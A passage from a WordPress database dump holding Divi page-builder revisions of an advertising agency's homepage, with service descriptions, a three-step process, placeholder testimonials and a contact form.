custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%32%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"|||21px||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" custom_message=\"New Lead From Website - whatthehell.co||et_pb_line_break_holder||||et_pb_line_break_holder||Name - %%Name%%||et_pb_line_break_holder||Email - %%Email%%||et_pb_line_break_holder||Company - %%Company%%||et_pb_line_break_holder||Message - %%Message%%\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" hover_enabled=\"0\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" hover_enabled=\"0\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-08 20:15:11','2020-07-08 20:15:11','',134,'https://52.66.212.87/2020/07/08/134-revision-v1/',0,'revision','',0),(278,1,'2020-07-08 20:17:01','2020-07-08 20:17:01','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" 